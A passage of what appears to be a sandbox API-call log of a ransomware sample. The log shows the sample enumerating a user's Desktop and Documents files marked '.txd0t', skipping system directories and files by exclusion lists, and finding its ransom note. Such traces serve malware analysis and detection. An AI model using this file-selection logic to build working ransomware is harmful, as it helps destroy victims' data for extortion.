returned 1 [0129.194] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Vn Oo.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t" [0129.194] PathFindExtensionW (pszPath="Vn Oo.gif.txd0t") returned=".txd0t" [0129.194] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.194] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf874130, ftCreationTime.dwHighDateTime=0x1d5e4bc, ftLastAccessTime.dwLowDateTime=0xae3a4210, ftLastAccessTime.dwHighDateTime=0x1d5e940, ftLastWriteTime.dwLowDateTime=0x5124d96b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16b8a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WDZdqCHFFcmh9_.mp3.txd0t", cAlternateFileName="WDZDQC~1.TXD")) returned 1 [0129.194] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3.txd0t", psz2=".") returned 1 [0129.194] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3.txd0t", psz2="..") returned 1 [0129.194] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="WDZdqCHFFcmh9_.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t" [0129.194] PathFindExtensionW (pszPath="WDZdqCHFFcmh9_.mp3.txd0t") returned=".txd0t" [0129.194] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.194] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb52350, ftCreationTime.dwHighDateTime=0x1d5ec3a, ftLastAccessTime.dwLowDateTime=0xf8088120, ftLastAccessTime.dwHighDateTime=0x1d5e8b1, ftLastWriteTime.dwLowDateTime=0x51278258, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wO3YP7g6H.wav.txd0t", cAlternateFileName="WO3YP7~1.TXD")) returned 1 [0129.194] StrCmpW (psz1="wO3YP7g6H.wav.txd0t", psz2=".") returned 1 [0129.194] StrCmpW (psz1="wO3YP7g6H.wav.txd0t", psz2="..") returned 1 [0129.194] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.194] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="wO3YP7g6H.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t" [0129.194] PathFindExtensionW (pszPath="wO3YP7g6H.wav.txd0t") returned=".txd0t" [0129.194] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.195] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bf8ae50, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xb2d1f1a0, ftLastAccessTime.dwHighDateTime=0x1d5e1f8, ftLastWriteTime.dwLowDateTime=0x51278258, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xee63, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yn-OCsN4T3Jmv.wav.txd0t", cAlternateFileName="YN-OCS~1.TXD")) returned 1 [0129.195] StrCmpW (psz1="yn-OCsN4T3Jmv.wav.txd0t", psz2=".") returned 1 [0129.195] StrCmpW (psz1="yn-OCsN4T3Jmv.wav.txd0t", psz2="..") returned 1 [0129.195] PathFindExtensionW (pszPath="yn-OCsN4T3Jmv.wav.txd0t") returned=".txd0t" [0129.195] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.195] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x378b4220, ftCreationTime.dwHighDateTime=0x1d5ea0f, ftLastAccessTime.dwLowDateTime=0x50cd2da0, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x51299e42, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbe34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Zau1_Q_6PWntC.gif.txd0t", cAlternateFileName="ZAU1_Q~1.TXD")) returned 1 [0129.195] StrCmpW (psz1="Zau1_Q_6PWntC.gif.txd0t", psz2=".") returned 1 [0129.195] StrCmpW (psz1="Zau1_Q_6PWntC.gif.txd0t", psz2="..") returned 1 [0129.195] PathFindExtensionW (pszPath="Zau1_Q_6PWntC.gif.txd0t") returned=".txd0t" [0129.195] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.195] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8b3a60, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xb6208b00, ftLastAccessTime.dwHighDateTime=0x1d5eaf9, ftLastWriteTime.dwLowDateTime=0x51299e42, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ae1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZSfJsNS2sePMKa.pps.txd0t", cAlternateFileName="ZSFJSN~1.TXD")) returned 1 [0129.195] StrCmpW (psz1="ZSfJsNS2sePMKa.pps.txd0t", psz2=".") returned 1 [0129.195] StrCmpW (psz1="ZSfJsNS2sePMKa.pps.txd0t", psz2="..") returned 1 [0129.195] PathFindExtensionW (pszPath="ZSfJsNS2sePMKa.pps.txd0t") returned=".txd0t" [0129.195] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.195] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0x512c0027, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x912f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cAlternateFileName="ZTT1ZU~1.TXD")) returned 1 [0129.195] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", psz2=".") returned 1 [0129.195] StrCmpW (psz1="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", psz2="..") returned 1 [0129.195] PathFindExtensionW (pszPath="ztT1zUqOHSnYLoXvx2_E.csv.txd0t") returned=".txd0t" [0129.195] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.195] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa54e95c0, ftCreationTime.dwHighDateTime=0x1d5eb66, ftLastAccessTime.dwLowDateTime=0xad201040, ftLastAccessTime.dwHighDateTime=0x1d5e331, ftLastWriteTime.dwLowDateTime=0x512c0027, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x912f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ztT1zUqOHSnYLoXvx2_E.csv.txd0t", cAlternateFileName="ZTT1ZU~1.TXD")) returned 0 [0129.196] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.196] GetProcessHeap () returned 0xe30000 [0129.196] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.196] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5ad15bdf, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0129.196] StrCmpW (psz1="Documents", psz2=".") returned 1 [0129.196] StrCmpW (psz1="Documents", psz2="..") returned 1 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system32\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\system\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\boot\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="crypt_detect") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="cryptolocker") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="ransomware") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.196] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0129.196] GetProcessHeap () returned 0xe30000 [0129.196] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.196] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.196] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\*") returned="C:\\Users\\FD1HVy\\Documents\\*" [0129.196] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5ad15bdf, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.197] StrCmpW (psz1=".", psz2=".") returned 0 [0129.197] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x5ad15bdf, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.197] StrCmpW (psz1="..", psz2=".") returned 1 [0129.197] StrCmpW (psz1="..", psz2="..") returned 0 [0129.197] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512e61c6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x512e61c6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5130c4da, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.197] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.197] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.197] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.197] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.197] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.197] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26df0010, ftCreationTime.dwHighDateTime=0x1d59cda, ftLastAccessTime.dwLowDateTime=0xd76e9320, ftLastAccessTime.dwHighDateTime=0x1d5dd83, ftLastWriteTime.dwLowDateTime=0x512e61c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9dae, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", cAlternateFileName="-NK0JW~1.TXD")) returned 1 [0129.197] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", psz2=".") returned 1 [0129.197] StrCmpW (psz1="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", psz2="..") returned 1 [0129.197] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.197] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.197] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="-nk0Jwf_DtIx7OFnM.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\-nk0Jwf_DtIx7OFnM.xlsx.txd0t" [0129.197] PathFindExtensionW (pszPath="-nk0Jwf_DtIx7OFnM.xlsx.txd0t") returned=".txd0t" [0129.197] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.197] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd5ddbb0, ftCreationTime.dwHighDateTime=0x1d58f75, ftLastAccessTime.dwLowDateTime=0x9feb6c70, ftLastAccessTime.dwHighDateTime=0x1d57776, ftLastWriteTime.dwLowDateTime=0x512e61c6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf5c7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="1WQmayKDv.pptx.txd0t", cAlternateFileName="1WQMAY~1.TXD")) returned 1 [0129.198] StrCmpW (psz1="1WQmayKDv.pptx.txd0t", psz2=".") returned 1 [0129.198] StrCmpW (psz1="1WQmayKDv.pptx.txd0t", psz2="..") returned 1 [0129.198] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="1WQmayKDv.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\1WQmayKDv.pptx.txd0t" [0129.198] PathFindExtensionW (pszPath="1WQmayKDv.pptx.txd0t") returned=".txd0t" [0129.198] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.198] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe5cd300, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x446fea50, ftLastAccessTime.dwHighDateTime=0x1d59d74, ftLastWriteTime.dwLowDateTime=0x5130c4da, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18c63, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="27kj6w0qCAmGPNM.docx.txd0t", cAlternateFileName="27KJ6W~1.TXD")) returned 1 [0129.198] StrCmpW (psz1="27kj6w0qCAmGPNM.docx.txd0t", psz2=".") returned 1 [0129.198] StrCmpW (psz1="27kj6w0qCAmGPNM.docx.txd0t", psz2="..") returned 1 [0129.198] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="27kj6w0qCAmGPNM.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\27kj6w0qCAmGPNM.docx.txd0t" [0129.198] PathFindExtensionW (pszPath="27kj6w0qCAmGPNM.docx.txd0t") returned=".txd0t" [0129.198] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.198] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb38f350, ftCreationTime.dwHighDateTime=0x1d57bb4, ftLastAccessTime.dwLowDateTime=0xfe7a2f50, ftLastAccessTime.dwHighDateTime=0x1d567f0, ftLastWriteTime.dwLowDateTime=0x51332989, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1373b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="4oSJqKCx.docx.txd0t", cAlternateFileName="4OSJQK~1.TXD")) returned 1 [0129.198] StrCmpW (psz1="4oSJqKCx.docx.txd0t", psz2=".") returned 1 [0129.198] StrCmpW (psz1="4oSJqKCx.docx.txd0t", psz2="..") returned 1 [0129.198] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="4oSJqKCx.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t" [0129.198] PathFindExtensionW (pszPath="4oSJqKCx.docx.txd0t") returned=".txd0t" [0129.198] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.198] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31841f70, ftCreationTime.dwHighDateTime=0x1d5e5a3, ftLastAccessTime.dwLowDateTime=0xc216dad0, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x51332989, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6042, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6IKlp7h.ppt.txd0t", cAlternateFileName="6IKLP7~1.TXD")) returned 1 [0129.198] StrCmpW (psz1="6IKlp7h.ppt.txd0t", psz2=".") returned 1 [0129.198] StrCmpW (psz1="6IKlp7h.ppt.txd0t", psz2="..") returned 1 [0129.198] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.198] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="6IKlp7h.ppt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t" [0129.198] PathFindExtensionW (pszPath="6IKlp7h.ppt.txd0t") returned=".txd0t" [0129.198] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.198] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528b4870, ftCreationTime.dwHighDateTime=0x1d5e1ce, ftLastAccessTime.dwLowDateTime=0xad54a8d0, ftLastAccessTime.dwHighDateTime=0x1d5ed79, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13841, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", cAlternateFileName="7D9VJ0~1.TXD")) returned 1 [0129.198] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", psz2=".") returned 1 [0129.199] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", psz2="..") returned 1 [0129.199] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.199] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t" [0129.199] PathFindExtensionW (pszPath="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned=".txd0t" [0129.199] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.199] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b06ef30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xf6036630, ftLastAccessTime.dwHighDateTime=0x1d5b939, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c15, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", cAlternateFileName="82F_2P~1.TXD")) returned 1 [0129.199] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", psz2=".") returned 1 [0129.199] StrCmpW 